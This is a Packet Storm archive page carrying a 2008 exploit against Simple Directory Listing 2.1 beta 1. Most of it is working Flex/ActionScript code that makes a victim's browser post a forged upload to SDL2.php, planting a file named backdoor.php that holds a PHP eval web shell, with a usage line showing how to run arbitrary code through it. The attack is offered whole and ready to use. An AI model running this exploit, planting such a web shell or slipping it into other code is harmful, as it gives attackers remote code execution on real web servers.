what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Simple Directory Listing Upload Vulnerability

Simple Directory Listing Upload Vulnerability
Posted Dec 9, 2008
Authored by Michael Brooks | Site rooksecurity.com

Simple Directory Listing version 2.1 beta 1 suffers from a cross site file upload vulnerability.

tags | exploit, file upload
SHA-256 | d41b2657c76cd59cd7b128d92c25922e04bdfc553a395a9b214d7bc493cb743b

Simple Directory Listing Upload Vulnerability

Change Mirror Download
Simple Directory Listing 2 - Cross Site File Upload
--------------------------------------------------------------------------------
<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()">
<mx:Script>
/*
Written by Michael Brooks

VUlerablity type: Cross Site File Upload.
Affects: SDL 2.1 beta1
Product homepage: http://simpledirectorylisting.net/

SDL has 22+ million downloads from sourceforge.net!
The top three php projects where hacked in one day using .

Exploit built using Flex 3.2 (http://www.adobe.com/go/flex_trial)
uploads ./backdoor.php in the same directory as SDL2.php
Backdoor Useage:
http://10.1.1.155/backdoor.php?e=phpinfo();
backdoor code:
<?php eval($_GET[e])?>

More info on Cross Site File Upload Attacks:
http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
Inspired by the work of Petko D. Petkov; pdp
* GNUCITIZEN
**/
import flash.net.*;
private function onAppInit():void{
var request:URLRequest = new URLRequest("http://10.1.1.155/SDL2.php?action=module&module=ModuleUpload&moduleParams[action]=upload&moduleParams[cwdRelPath]=");
request.requestHeaders.push(new URLRequestHeader('Content-Type', 'multipart/form-data; boundary=---------------------------109092118919201'));
request.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22backdoor.php%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0A%3C%3Fphp eval%28stripslashes%28%24_GET%5Be%5D%29%29%3F%3E%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22upload%22%0D%0A%0D%0AUpload%0D%0A-----------------------------109092118919201--%0A');
request.method = URLRequestMethod.POST;
navigateToURL(request, '_self');
}
</mx:Script>
</mx:Application>

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close